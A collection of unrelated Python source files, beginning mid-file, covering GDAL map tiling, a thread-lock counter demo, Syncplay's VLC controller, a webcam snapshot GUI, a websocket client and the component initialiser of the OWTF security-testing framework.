= (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1]) west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tilesize * pixelsizex east = west + tile_job_info.tilesize * pixelsizex south = tile_job_info.ominy + y * tile_job_info.tilesize * pixelsizex north = south + tile_job_info.tilesize * pixelsizex if not tile_job_info.is_epsg_4326: # Transformation to EPSG:4326 (WGS84 datum) west, south = ct.TransformPoint(west, south)[:2] east, north = ct.TransformPoint(east, north)[:2] return south, west, north, east tile_swne = rastertileswne else: tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa else: tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa return tile_swne def single_threaded_tiling(input_file, output_folder, options): """ Keep a single threaded version that stays clear of multiprocessing, for platforms that would not support it """ if options.verbose: print("Begin tiles details calc") conf, tile_details = worker_tile_details(input_file, output_folder, options) if options.verbose: print("Tiles details calc complete.") if not options.verbose and not options.quiet: progress_bar = ProgressBar(len(tile_details)) progress_bar.start() for tile_detail in tile_details: create_base_tile(conf, tile_detail) if not options.verbose and not options.quiet: progress_bar.log_progress() create_overview_tiles(conf, output_folder, options) shutil.rmtree(os.path.dirname(conf.src_file)) def multi_threaded_tiling(input_file, output_folder, options): nb_processes = options.nb_processes or 1 (conf_receiver, conf_sender) = Pipe(False) if options.verbose: print("Begin tiles details calc") p = Process(target=worker_tile_details, args=[input_file, output_folder, options], kwargs={"send_pipe": conf_sender}) p.start() # Make sure to consume the queue before joining. 
If the payload is too big, it won't be put in # one go in the queue and therefore the sending process will never finish, waiting for space in # the queue to send data conf, tile_details = conf_receiver.recv() p.join() if options.verbose: print("Tiles details calc complete.") # Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy, # otherwise you can't pass it as a param in the method invoked by the pool... manager = Manager() queue = manager.Queue() pool = Pool(processes=nb_processes) # TODO: gbataille - check the confs for which each element is an array... one useless level? # TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..." # TODO: gbataille - check memory footprint and time on big image. are they opened x times for tile_detail in tile_details: pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue}) if not options.verbose and not options.quiet: p = Process(target=progress_printer_thread, args=[queue, len(tile_details)]) p.start() pool.close() pool.join() # Jobs finished if not options.verbose and not options.quiet: p.join() # Traces done create_overview_tiles(conf, output_folder, options) shutil.rmtree(os.path.dirname(conf.src_file)) def main(): # TODO: gbataille - use mkdtemp to work in a temp directory # TODO: gbataille - debug intermediate tiles.vrt not produced anymore? # TODO: gbataille - Refactor generate overview tiles to not depend on self variables argv = gdal.GeneralCmdLineProcessor(sys.argv) input_file, output_folder, options = process_args(argv[1:]) nb_processes = options.nb_processes or 1 if nb_processes == 1: single_threaded_tiling(input_file, output_folder, options) else: multi_threaded_tiling(input_file, output_folder, options) if __name__ == '__main__': main() # vim: set tabstop=4 shiftwidth=4 expandtab:
# ===== file boundary: multi_threading_variable_share.py =====
import threading
import time

# Shared counter incremented by both worker threads; every mutation is
# serialized through `mutex` (defined below, before the threads start).
g_num = 0


def work1(num):
    """Increment the shared counter `g_num` exactly `num` times.

    Each increment is performed while holding `mutex`, so concurrent
    read-modify-write races with the other worker are impossible.
    """
    global g_num
    for _ in range(num):
        # `with mutex` is equivalent to acquire(True)/release() but also
        # releases the lock if the body raises (the original `if acquire`
        # pattern leaked the lock on exception).
        with mutex:
            g_num += 1
    print('---in work1,g_num in %d---' % g_num)


def work2(num):
    """Increment the shared counter `g_num` exactly `num` times.

    Identical to work1; kept as a separate function so each thread's
    completion message identifies which worker printed it.
    """
    global g_num
    for _ in range(num):
        with mutex:
            g_num += 1
    print('---in work2,g_num in %d---' % g_num)


print('---线程创建之前g_num: %d' % g_num)

mutex = threading.Lock()

t1 = threading.Thread(target=work1, args=(1000000,))
t2 = threading.Thread(target=work2, args=(1000000,))
t1.start()
t2.start()

# Wait for both workers directly instead of the original pattern of an
# arbitrary time.sleep(1) plus busy-polling threading.enumerate().
t1.join()
t2.join()

print('2个线程对同一个变量操作之后的最终结果:%d' % g_num)
# ===== file boundary: vlc.py =====
import asynchat import asyncore import os import random import re import socket import subprocess import sys import threading import time import urllib.error import urllib.parse import urllib.request from syncplay import constants, utils from syncplay.messages import getMessage from syncplay.players.basePlayer import BasePlayer from syncplay.utils import isBSD, isLinux, isWindows, isMacOS class VlcPlayer(BasePlayer): speedSupported = True customOpenDialog = False chatOSDSupported = False alertOSDSupported = True osdMessageSeparator = "; " RE_ANSWER = re.compile(constants.VLC_ANSWER_REGEX) SLAVE_ARGS = constants.VLC_SLAVE_ARGS if isMacOS(): SLAVE_ARGS.extend(constants.VLC_SLAVE_MACOS_ARGS) else: SLAVE_ARGS.extend(constants.VLC_SLAVE_NONMACOS_ARGS) vlcport = random.randrange(constants.VLC_MIN_PORT, constants.VLC_MAX_PORT) if (constants.VLC_MIN_PORT < constants.VLC_MAX_PORT) else constants.VLC_MIN_PORT def __init__(self, client, playerPath, filePath, args): from twisted.internet import reactor self.reactor = reactor self._client = client self._paused = None self._duration = None self._filename = None self._filepath = None self._filechanged = False self._lastVLCPositionUpdate = None self.shownVLCLatencyError = False self._previousPreviousPosition = -2 self._previousPosition = -1 self._position = 0 try: # Hack to fix locale issue without importing locale library self.radixChar = "{:n}".format(1.5)[1:2] if self.radixChar == "" or self.radixChar == "1" or self.radixChar == "5": raise ValueError except: self._client.ui.showErrorMessage( "Failed to determine locale. As a fallback Syncplay is using the following radix character: \".\".") self.radixChar = "." 
self._durationAsk = threading.Event() self._filenameAsk = threading.Event() self._pathAsk = threading.Event() self._positionAsk = threading.Event() self._pausedAsk = threading.Event() self._vlcready = threading.Event() self._vlcclosed = threading.Event() self._listener = None try: self._listener = self.__Listener(self, playerPath, filePath, args, self._vlcready, self._vlcclosed) except ValueError: self._client.ui.showErrorMessage(getMessage("vlc-failed-connection"), True) self.reactor.callFromThread(self._client.stop, True,) return try: self._listener.setDaemon(True) self._listener.start() if not self._vlcready.wait(constants.VLC_OPEN_MAX_WAIT_TIME): self._vlcready.set() self._client.ui.showErrorMessage(getMessage("vlc-failed-connection"), True) self.reactor.callFromThread(self._client.stop, True,) self.reactor.callFromThread(self._client.initPlayer, self,) except: pass def _fileUpdateClearEvents(self): self._durationAsk.clear() self._filenameAsk.clear() self._pathAsk.clear() def _fileUpdateWaitEvents(self): self._durationAsk.wait() self._filenameAsk.wait() self._pathAsk.wait() def _onFileUpdate(self): self._fileUpdateClearEvents() self._getFileInfo() self._fileUpdateWaitEvents() args = (self._filename, self._duration, self._filepath) self.reactor.callFromThread(self._client.updateFile, *args) self.setPaused(self._client.getGlobalPaused()) self.setPosition(self._client.getGlobalPosition()) def askForStatus(self): self._filechanged = False self._positionAsk.clear() self._pausedAsk.clear() self._listener.sendLine(".") if self._filename and not self._filechanged: self._positionAsk.wait(constants.PLAYER_ASK_DELAY) self._client.updatePlayerStatus(self._paused, self.getCalculatedPosition()) else: self._client.updatePlayerStatus(self._client.getGlobalPaused(), self._client.getGlobalPosition()) def getCalculatedPosition(self): if self._lastVLCPositionUpdate is None: return self._client.getGlobalPosition() diff = time.time() - self._lastVLCPositionUpdate if diff > 
constants.PLAYER_ASK_DELAY and not self._paused: self._client.ui.showDebugMessage("VLC did not response in time, so assuming position is {} ({}+{})".format( self._position + diff, self._position, diff)) if diff > constants.VLC_LATENCY_ERROR_THRESHOLD: if not self.shownVLCLatencyError or constants.DEBUG_MODE: self._client.ui.showErrorMessage(getMessage("media-player-latency-warning").format(int(diff))) self.shownVLCLatencyError = True return self._position + diff else: return self._position def displayMessage( self, message, duration=constants.OSD_DURATION * 1000, OSDType=constants.OSD_DURATION, mood=constants.MESSAGE_NEUTRAL ): duration /= 1000 if OSDType != constants.OSD_ALERT: self._listener.sendLine('display-osd: {}, {}, {}'.format('top-right', duration, message)) else: self._listener.sendLine('display-secondary-osd: {}, {}, {}'.format('center', duration, message)) def setSpeed(self, value): self._listener.sendLine("set-rate: {:.2n}".format(value)) def setFeatures(self, featureList): pass def setPosition(self, value): self._lastVLCPositionUpdate = time.time() self._listener.sendLine("set-position: {}".format(value).replace(".", self.radixChar)) def setPaused(self, value): self._paused = value if not value: self._lastVLCPositionUpdate = time.time() self._listener.sendLine('set-playstate: {}'.format("paused" if value else "playing")) def getMRL(self, fileURL): if utils.isURL(fileURL): fileURL = urllib.parse.quote(fileURL, safe="%/:=&?~#+!$,;'@()*") return fileURL fileURL = fileURL.replace('\\', '/') fileURL = fileURL.encode('utf8') fileURL = urllib.parse.quote_plus(fileURL) if isWindows(): fileURL = "file:///" + fileURL else: fileURL = "file://" + fileURL fileURL = fileURL.replace("+", "%20") return fileURL def openFile(self, filePath, resetPosition=False): if not utils.isURL(filePath): normedPath = os.path.normpath(filePath) if os.path.isfile(normedPath): filePath = normedPath if utils.isASCII(filePath) and not utils.isURL(filePath): 
self._listener.sendLine('load-file: {}'.format(filePath)) else: fileURL = self.getMRL(filePath) self._listener.sendLine('load-file: {}'.format(fileURL)) def _getFileInfo(self): self._listener.sendLine("get-duration") self._listener.sendLine("get-filepath") self._listener.sendLine("get-filename") def lineReceived(self, line): # try: line = line.decode('utf-8') self._client.ui.showDebugMessage("player << {}".format(line)) # except: # pass match, name, value = self.RE_ANSWER.match(line), "", "" if match: name, value = match.group('command'), match.group('argument') if line == "filepath-change-notification": self._filechanged = True t = threading.Thread(target=self._onFileUpdate) t.setDaemon(True) t.start() elif name == "filepath": self._filechanged = True if value == "no-input": self._filepath = None else: if "file://" in value: value = value.replace("file://", "") if not os.path.isfile(value): value = value.lstrip("/") elif utils.isURL(value): value = urllib.parse.unquote(value) # value = value.decode('utf-8') self._filepath = value self._pathAsk.set() elif name == "duration": if value == "no-input": self._duration = 0 elif value == "invalid-32-bit-value": self._duration = 0 self.drop(getMessage("vlc-failed-versioncheck")) else: self._duration = float(value.replace(",", ".")) self._durationAsk.set() elif name == "playstate": self._paused = bool(value != 'playing') if (value != "no-input" and self._filechanged == False) else self._client.getGlobalPaused() diff = time.time() - self._lastVLCPositionUpdate if self._lastVLCPositionUpdate else 0 if ( self._paused == False and self._position == self._previousPreviousPosition and self._previousPosition == self._position and self._duration > constants.PLAYLIST_LOAD_NEXT_FILE_MINIMUM_LENGTH and (self._duration - self._position) < constants.VLC_EOF_DURATION_THRESHOLD and diff > constants.VLC_LATENCY_ERROR_THRESHOLD ): self._client.ui.showDebugMessage("Treating 'playing' response as 'paused' due to VLC EOF bug") 
self.setPaused(True) self._pausedAsk.set() elif name == "position": newPosition = float(value.replace(",", ".")) if (value != "no-input" and not self._filechanged) else self._client.getGlobalPosition() if newPosition == self._previousPosition and newPosition != self._duration and self._paused is False: self._client.ui.showDebugMessage( "Not considering position {} duplicate as new time because of VLC time precision bug".format( newPosition)) self._previousPreviousPosition = self._previousPosition self._previousPosition = self._position self._positionAsk.set() return self._previousPreviousPosition = self._previousPosition self._previousPosition = self._position self._position = newPosition if self._position < 0 and self._duration > 2147 and self._vlcVersion == "3.0.0": self.drop(getMessage("vlc-failed-versioncheck")) self._lastVLCPositionUpdate = time.time() self._positionAsk.set() elif name == "filename": self._filechanged = True self._filename = value self._filenameAsk.set() elif line.startswith("vlc-version: "): self._vlcVersion = line.split(': ')[1].replace(' ', '-').split('-')[0] if not utils.meetsMinVersion(self._vlcVersion, constants.VLC_MIN_VERSION): self._client.ui.showErrorMessage(getMessage("vlc-version-mismatch").format(constants.VLC_MIN_VERSION)) self._vlcready.set() @staticmethod def run(client, playerPath, filePath, args): vlc = VlcPlayer(client, VlcPlayer.getExpandedPath(playerPath), filePath, args) return vlc @staticmethod def getDefaultPlayerPathsList(): l = [] for path in constants.VLC_PATHS: p = VlcPlayer.getExpandedPath(path) if p: l.append(p) return l @staticmethod def isValidPlayerPath(path): if "vlc" in path.lower() and VlcPlayer.getExpandedPath(path): return True return False @staticmethod def getPlayerPathErrors(playerPath, filePath): return None @staticmethod def getIconPath(path): return constants.VLC_ICONPATH @staticmethod def getExpandedPath(playerPath): if not os.path.isfile(playerPath): if os.path.isfile(playerPath + "vlc.exe"): 
playerPath += "vlc.exe" return playerPath elif os.path.isfile(playerPath + "\\vlc.exe"): playerPath += "\\vlc.exe" return playerPath elif os.path.isfile(playerPath + "VLCPortable.exe"): playerPath += "VLCPortable.exe" return playerPath elif os.path.isfile(playerPath + "\\VLCPortable.exe"): playerPath += "\\VLCPortable.exe" return playerPath if os.access(playerPath, os.X_OK): return playerPath for path in os.environ['PATH'].split(':'): path = os.path.join(os.path.realpath(path), playerPath) if os.access(path, os.X_OK): return path def drop(self, dropErrorMessage=None): if self._listener: self._vlcclosed.clear() self._listener.sendLine('close-vlc') self._vlcclosed.wait() self._durationAsk.set() self._filenameAsk.set() self._pathAsk.set() self._positionAsk.set() self._vlcready.set() self._pausedAsk.set() if dropErrorMessage: self.reactor.callFromThread(self._client.ui.showErrorMessage, dropErrorMessage, True) self.reactor.callFromThread(self._client.stop, False,) class __Listener(threading.Thread, asynchat.async_chat): def __init__(self, playerController, playerPath, filePath, args, vlcReady, vlcClosed): self.__playerController = playerController self.requestedVLCVersion = False self.vlcHasResponded = False self.oldIntfVersion = None self.timeVLCLaunched = None call = [playerPath] if filePath: if utils.isASCII(filePath): call.append(filePath) else: call.append(self.__playerController.getMRL(filePath)) def _usevlcintf(vlcIntfPath, vlcIntfUserPath): vlcSyncplayInterfacePath = vlcIntfPath + "syncplay.lua" if not os.path.isfile(vlcSyncplayInterfacePath): vlcSyncplayInterfacePath = vlcIntfUserPath + "syncplay.lua" if os.path.isfile(vlcSyncplayInterfacePath): with open(vlcSyncplayInterfacePath, 'rU') as interfacefile: for line in interfacefile: if "local connectorversion" in line: interface_version = line[26:31] if utils.meetsMinVersion(interface_version, constants.VLC_INTERFACE_MIN_VERSION): return True else: self.oldIntfVersion = line[26:31] return False 
playerController._client.ui.showErrorMessage(getMessage("vlc-interface-not-installed")) return False if isLinux(): playerController.vlcIntfPath = "/usr/lib/vlc/lua/intf/" playerController.vlcIntfUserPath = os.path.join(os.getenv('HOME', '.'), ".local/share/vlc/lua/intf/") elif isMacOS(): playerController.vlcIntfPath = "/Applications/VLC.app/Contents/MacOS/share/lua/intf/" playerController.vlcIntfUserPath = os.path.join( os.getenv('HOME', '.'), "Library/Application Support/org.videolan.vlc/lua/intf/") elif isBSD(): # *BSD ports/pkgs install to /usr/local by default. # This should also work for all the other BSDs, such as OpenBSD or DragonFly. playerController.vlcIntfPath = "/usr/local/lib/vlc/lua/intf/" playerController.vlcIntfUserPath = os.path.join(os.getenv('HOME', '.'), ".local/share/vlc/lua/intf/") else: playerController.vlcIntfPath = os.path.dirname(playerPath).replace("\\", "/") + "/lua/intf/" playerController.vlcIntfUserPath = os.path.join(os.getenv('APPDATA', '.'), "VLC\\lua\\intf\\") playerController.vlcModulePath = playerController.vlcIntfPath + "modules/?.luac" if _usevlcintf(playerController.vlcIntfPath, playerController.vlcIntfUserPath): playerController.SLAVE_ARGS.append( '--lua-config=syncplay={{port=\"{}\"}}'.format(str(playerController.vlcport))) else: if isLinux(): playerController.vlcDataPath = "/usr/lib/syncplay/resources" else: playerController.vlcDataPath = utils.findWorkingDir() + "\\resources" playerController.SLAVE_ARGS.append('--data-path={}'.format(playerController.vlcDataPath)) playerController.SLAVE_ARGS.append( '--lua-config=syncplay={{modulepath=\"{}\",port=\"{}\"}}'.format( playerController.vlcModulePath, str(playerController.vlcport))) call.extend(playerController.SLAVE_ARGS) if args: call.extend(args) self._vlcready = vlcReady self._vlcclosed = vlcClosed self._vlcVersion = None if self.oldIntfVersion: self.__playerController.drop( getMessage("vlc-interface-version-mismatch").format( self.oldIntfVersion, 
constants.VLC_INTERFACE_MIN_VERSION)) else: if isWindows() and getattr(sys, 'frozen', '') and getattr(sys, '_MEIPASS', '') is not None: # Needed for pyinstaller --onefile bundle self.__process = subprocess.Popen( call, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False, creationflags=0x08000000) else: self.__process = subprocess.Popen(call, stderr=subprocess.PIPE, stdout=subprocess.PIPE) self.timeVLCLaunched = time.time() if self._shouldListenForSTDOUT(): for line in iter(self.__process.stderr.readline, ''): line = line.decode('utf-8') self.vlcHasResponded = True self.timeVLCLaunched = None if "[syncplay]" in line: if "Listening on host" in line: break if "Hosting Syncplay" in line: break elif "Couldn't find lua interface" in line: playerController._client.ui.showErrorMessage( getMessage("vlc-failed-noscript").format(line), True) break elif "lua interface error" in line: playerController._client.ui.showErrorMessage( getMessage("media-player-error").format(line), True) break if not isMacOS(): self.__process.stderr = None else: vlcoutputthread = threading.Thread(target=self.handle_vlcoutput, args=()) vlcoutputthread.setDaemon(True) vlcoutputthread.start() threading.Thread.__init__(self, name="VLC Listener") asynchat.async_chat.__init__(self) self.set_terminator(b'\n') self._ibuffer = [] self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self._sendingData = threading.Lock() def _shouldListenForSTDOUT(self): return not isWindows() def initiate_send(self): with self._sendingData: asynchat.async_chat.initiate_send(self) def run(self): self._vlcready.clear() self.connect(('localhost', self.__playerController.vlcport)) asyncore.loop() def handle_connect(self): asynchat.async_chat.handle_connect(self) self._vlcready.set() self.timeVLCLaunched = None def collect_incoming_data(self, data): self._ibuffer.append(data) def handle_close(self): if self.timeVLCLaunched and time.time() - self.timeVLCLaunched < constants.VLC_OPEN_MAX_WAIT_TIME: 
try: self.__playerController._client.ui.showDebugMessage("Failed to connect to VLC, but reconnecting as within max wait time") except: pass self.run() elif self.vlcHasResponded: asynchat.async_chat.handle_close(self) self.__playerController.drop() else: self.vlcHasResponded = True asynchat.async_chat.handle_close(self) self.__playerController.drop(getMessage("vlc-failed-connection").format(constants.VLC_MIN_VERSION)) def handle_vlcoutput(self): out = self.__process.stderr for line in iter(out.readline, ''): line = line.decode('utf-8') if '[syncplay] core interface debug: removing module' in line: self.__playerController.drop() break out.close() def found_terminator(self): self.vlcHasResponded = True self.__playerController.lineReceived(b"".join(self._ibuffer)) self._ibuffer = [] def sendLine(self, line): if self.connected: if not self.requestedVLCVersion: self.requestedVLCVersion = True self.sendLine("get-vlc-version") # try: lineToSend = line + "\n" self.push(lineToSend.encode('utf-8')) if self.__playerController._client and self.__playerController._client.ui: self.__playerController._client.ui.showDebugMessage("player >> {}".format(line)) # except: # pass if line == "close-vlc": self._vlcclosed.set() if not self.connected and not self.timeVLCLaunched: # For circumstances where Syncplay is not connected to VLC and is not reconnecting try: self.__process.terminate() except: # When VLC is already closed pass
# ===== file boundary: app.py =====
from __future__ import print_function from PIL import Image from PIL import ImageTk import Tkinter as tki import threading import datetime import imutils import cv2 import os class SpikeLive: def __init__(self, vs, outputPath): self.vs = vs self.outputPath = outputPath self.frame = None self.thread = None self.stopEvent = None self.root = tki.Tk() self.panel = None btn = tki.Button(self.root, text = "Snapshot!", command = self.takeSnapshot) btn.pack(side = "bottom", fill = "both", expand = "yes", padx = 10, pady = 10) self.stopEvent = threading.Event() self.thread = threading.Thread(target = self.videoLoop, args = {}) self.thread.start() self.root.wm_title("PyImageSearch Photobooth") self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose) def videoLoop(self): try: while not self.stopEvent.is_set(): self.frame = self.vs.read() self.frame = imutils.resize(self.frame, width = 300) image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGB) image = Image.fromarray(image) image = ImageTk.PhotoImage(image) if self.panel is None: self.panel = tki.Label(image = image) self.panel.image = image self.panel.pack(side = "left", padx = 10, pady = 10) else: self.panel.configure(image = image) self.panel.image = image except RuntimeError: print('[INFO] caught a RuntimeError') def takeSnapshot(self): ts =datetime.datetime.now() filename = "{}.jpg".format(ts.strftime("%Y-%m-%d_%H-%M-%S")) p = os.path.sep.join((self.outputPath, filename)) cv2.imwrite(p, self.frame.copy()) print('[INFO] saved {}'.format(filename)) def onClose(self): print('[INFO] closing...') self.stopEvent.set() self.vs.stop() self.root.quit()
# ===== file boundary: generic_websocket.py =====
""" Module used as a interfeace to describe a generick websocket client """ import asyncio import websockets import socket import json import time from threading import Thread from pyee import EventEmitter from ..utils.custom_logger import CustomLogger # websocket exceptions from websockets.exceptions import ConnectionClosed class AuthError(Exception): """ Thrown whenever there is a problem with the authentication packet """ pass def is_json(myjson): try: json_object = json.loads(myjson) except ValueError as e: return False return True class Socket(): def __init__(self, sId): self.ws = None self.isConnected = False self.isAuthenticated = False self.id = sId def set_connected(self): self.isConnected = True def set_disconnected(self): self.isConnected = False def set_authenticated(self): self.isAuthenticated = True def set_unauthenticated(self): self.isAuthenticated = False def set_websocket(self, ws): self.ws = ws def _start_event_worker(): async def event_sleep_process(): """ sleeping process for event emitter to schedule on """ while True: await asyncio.sleep(0) def start_loop(loop): asyncio.set_event_loop(loop) loop.run_until_complete(event_sleep_process()) event_loop = asyncio.new_event_loop() worker = Thread(target=start_loop, args=(event_loop,)) worker.start() ee = EventEmitter(scheduler=asyncio.ensure_future, loop=event_loop) return ee class GenericWebsocket: """ Websocket object used to contain the base functionality of a websocket. Inlcudes an event emitter and a standard websocket client. 
""" def __init__(self, host, logLevel='INFO', max_retries=5, create_event_emitter=None): self.host = host self.logger = CustomLogger('BfxWebsocket', logLevel=logLevel) # overide 'error' event to stop it raising an exception # self.events.on('error', self.on_error) self.ws = None self.max_retries = max_retries self.attempt_retry = True self.sockets = {} # start seperate process for the even emitter create_ee = create_event_emitter or _start_event_worker self.events = create_ee() def run(self): """ Starte the websocket connection. This functions spawns the initial socket thread and connection. """ self._start_new_socket() def get_task_executable(self): """ Get the run indefinitely asyncio task """ return self._run_socket() def _start_new_socket(self, socketId=None): if not socketId: socketId = len(self.sockets) def start_loop(loop): asyncio.set_event_loop(loop) loop.run_until_complete(self._run_socket()) worker_loop = asyncio.new_event_loop() worker = Thread(target=start_loop, args=(worker_loop,)) worker.start() return socketId def _wait_for_socket(self, socket_id): """ Block until the given socket connection is open """ while True: socket = self.sockets.get(socket_id, False) if socket: if socket.isConnected and socket.ws: return time.sleep(0.01) async def _connect(self, socket): async with websockets.connect(self.host) as websocket: self.sockets[socket.id].set_websocket(websocket) self.sockets[socket.id].set_connected() self.logger.info("Websocket connected to {}".format(self.host)) while True: await asyncio.sleep(0) message = await websocket.recv() await self.on_message(socket.id, message) def get_socket(self, socketId): return self.sockets[socketId] def get_authenticated_socket(self): for socketId in self.sockets: if self.sockets[socketId].isAuthenticated: return self.sockets[socketId] return None async def _run_socket(self): retries = 0 sId = len(self.sockets) s = Socket(sId) self.sockets[sId] = s while retries < self.max_retries and self.attempt_retry: try: 
await self._connect(s) retries = 0 except (ConnectionClosed, socket.error) as e: self.sockets[sId].set_disconnected() if self.sockets[sId].isAuthenticated: self.sockets[sId].set_unauthenticated() self._emit('disconnected') if (not self.attempt_retry): return self.logger.error(str(e)) retries += 1 # wait 5 seconds befor retrying self.logger.info("Waiting 5 seconds before retrying...") await asyncio.sleep(5) self.logger.info("Reconnect attempt {}/{}".format(retries, self.max_retries)) self.logger.info("Unable to connect to websocket.") self._emit('stopped') def remove_all_listeners(self, event): """ Remove all listeners from event emitter """ self.events.remove_all_listeners(event) def on(self, event, func=None): """ Add a new event to the event emitter """ if not func: return self.events.on(event) self.events.on(event, func) def once(self, event, func=None): """ Add a new event to only fire once to the event emitter """ if not func: return self.events.once(event) self.events.once(event, func) def _emit(self, event, *args, **kwargs): self.events.emit(event, *args, **kwargs) async def on_error(self, error): """ On websocket error print and fire event """ self.logger.error(error) async def on_close(self): """ On websocket close print and fire event. This is used by the data server. """ self.logger.info("Websocket closed.") self.attempt_retry = False for key, socket in self.sockets.items(): await socket.ws.close() self._emit('done') async def on_open(self): """ On websocket open """ pass async def on_message(self, message): """ On websocket message """ pass
# ===== file boundary: component_initialiser.py =====
import logging
import multiprocessing
# BUGFIX: this module calls time.time(), time.strftime() and time.localtime(),
# which live in the stdlib `time` module.  The original `from datetime import
# time` bound the datetime.time *type* to that name, so every proxy-check path
# raised AttributeError at runtime.
import time

from framework.config.config import Config
from framework.db.command_register import CommandRegister
from framework.db.config_manager import ConfigDB
from framework.db.db import DB
from framework.db.error_manager import ErrorDB
from framework.db.mapping_manager import MappingDB
from framework.db.plugin_manager import PluginDB
from framework.db.poutput_manager import POutputDB
from framework.db.resource_manager import ResourceDB
from framework.db.session_manager import OWTFSessionDB
from framework.db.target_manager import TargetDB
from framework.db.transaction_manager import TransactionManager
from framework.db.url_manager import URLManager
from framework.db.worklist_manager import WorklistManager
from framework.dependency_management.dependency_resolver import ServiceLocator
from framework.error_handler import ErrorHandler
from framework.http.proxy.outbound_proxyminer import Proxy_Miner
from framework.http.proxy.proxy_manager import Proxy_manager, Proxy_Checker
from framework.http.requester import Requester
from framework.interface.reporter import Reporter
from framework.lib.general import cprint
from framework.plugin.plugin_handler import PluginHandler
from framework.plugin.plugin_helper import PluginHelper
from framework.plugin.plugin_params import PluginParams
from framework.protocols.smtp import SMTP
from framework.protocols.smb import SMB
from framework.selenium.selenium_handler import Selenium
from framework.shell.blocking_shell import Shell
from framework.shell.interactive_shell import InteractiveShell
from framework.timer import Timer
from framework.wrappers.set.set_handler import SETHandler
from framework.zap import ZAP_API
from framework.zest import Zest


class ComponentInitialiser():
    """
    Initialises all the components for the OWTF framework. The order is
    important as there are dependencies between modules. Cyclic dependencies
    are solved using a two-step initialization process through an init()
    method.
    """

    @staticmethod
    def initialisation_phase_1(root_dir, owtf_pid):
        """First phase of the initialization.

        :param str root_dir: Absolute path to the OWTF root.
        :param int owtf_pid: PID for the OWTF process.
        """
        Config(root_dir, owtf_pid)
        ErrorHandler()
        DB()
        try:
            OWTFSessionDB()
        except Exception:
            # First real database access: any failure here is treated as the
            # database server being unreachable.  (Narrowed from a bare
            # `except:` that also swallowed SystemExit/KeyboardInterrupt.)
            raise DatabaseNotRunningException()
        WorklistManager()
        ConfigDB()
        CommandRegister()
        TargetDB()
        ResourceDB()
        ErrorDB()
        MappingDB()
        PluginDB()
        Zest()
        URLManager()
        TransactionManager()

    @staticmethod
    def initialisation_phase_2(args):
        """ Second phase of the initialization process.

        :param dict args: parsed arguments from the command line.
        """
        db_config = ServiceLocator.get_component("db_config")
        db_config.init()
        Timer(db_config.Get('DATE_TIME_FORMAT'))
        ServiceLocator.get_component("db_plugin").init()
        ServiceLocator.get_component("config").init()
        ServiceLocator.get_component("zest").init()
        PluginHandler(args)
        Reporter()
        POutputDB()
        ServiceLocator.get_component("command_register").init()
        ServiceLocator.get_component("worklist_manager").init()
        Shell()
        PluginParams(args)
        SMB()
        InteractiveShell()
        Selenium()
        SMTP()
        SETHandler()
        ZAP_API()

    @staticmethod
    def initialisation_phase_3(options):
        """ Third phase of the initialization process.

        :param dict options: Options from command line.
        """
        ServiceLocator.get_component("resource").init()
        ServiceLocator.get_component("mapping_db").init()
        ServiceLocator.get_component("db").init()
        db_config = ServiceLocator.get_component("db_config")
        ServiceLocator.get_component("error_handler").init()
        # The inbound proxy address is what the Requester must route through.
        proxy = [db_config.Get('INBOUND_PROXY_IP'), db_config.Get('INBOUND_PROXY_PORT')]
        Requester(proxy)
        PluginHelper()
        ServiceLocator.get_component("plugin_handler").init(options)
        ServiceLocator.get_component("reporter").init()

    @staticmethod
    def intialise_proxy_manager(options):
        """ Proxy Manager initialization.

        :param dict options: Proxy manager configuration parameters.
        """
        proxy_manager = None
        if options['Botnet_mode'] is not None:
            proxy_manager = Proxy_manager()
            answer = "Yes"
            proxies = []
            if options['Botnet_mode'][0] == "miner":
                miner = Proxy_Miner()
                proxies = miner.start_miner()

            if options['Botnet_mode'][0] == "list":  # load proxies from list
                proxies = proxy_manager.load_proxy_list(options['Botnet_mode'][1])
                # raw_input: this codebase targets Python 2.
                answer = raw_input("[#] Do you want to check the proxy list? [Yes/no] : ")

            if answer.upper() in ["", "YES", "Y"]:
                proxy_q = multiprocessing.Queue()
                proxy_checker = multiprocessing.Process(
                    target=Proxy_Checker.check_proxies,
                    args=(proxy_q, proxies,))
                logging.info("Checking Proxies...")
                start_time = time.time()
                proxy_checker.start()
                proxies = proxy_q.get()
                proxy_checker.join()

            proxy_manager.proxies = proxies
            proxy_manager.number_of_proxies = len(proxies)

            if options['Botnet_mode'][0] == "miner":
                logging.info("Writing proxies to disk(~/.owtf/proxy_miner/proxies.txt)")
                miner.export_proxies_to_file("proxies.txt", proxies)
            if answer.upper() in ["", "YES", "Y"]:
                # NOTE(review): localtime() interprets the elapsed seconds as an
                # epoch timestamp; the -3600 looks like a UTC+1 offset hack and
                # will misreport elapsed time in other timezones — TODO confirm.
                logging.info(
                    "Proxy Check Time: %s" % time.strftime(
                        '%H:%M:%S',
                        time.localtime(time.time() - start_time - 3600)))
                cprint("Done")

            # `== 0`, not `is 0`: identity comparison with an int literal only
            # works by CPython's small-int caching accident.
            if proxy_manager.number_of_proxies == 0:
                ServiceLocator.get_component("error_handler").FrameworkAbort("No Alive proxies.")

            proxy = proxy_manager.get_next_available_proxy()

            # check proxy var... http:// sock://
            options['OutboundProxy'] = []
            options['OutboundProxy'].append(proxy["proxy"][0])
            options['OutboundProxy'].append(proxy["proxy"][1])


class DatabaseNotRunningException(Exception):
    """Raised when the OWTF database server cannot be reached."""
    pass
test_generator_mt19937.py
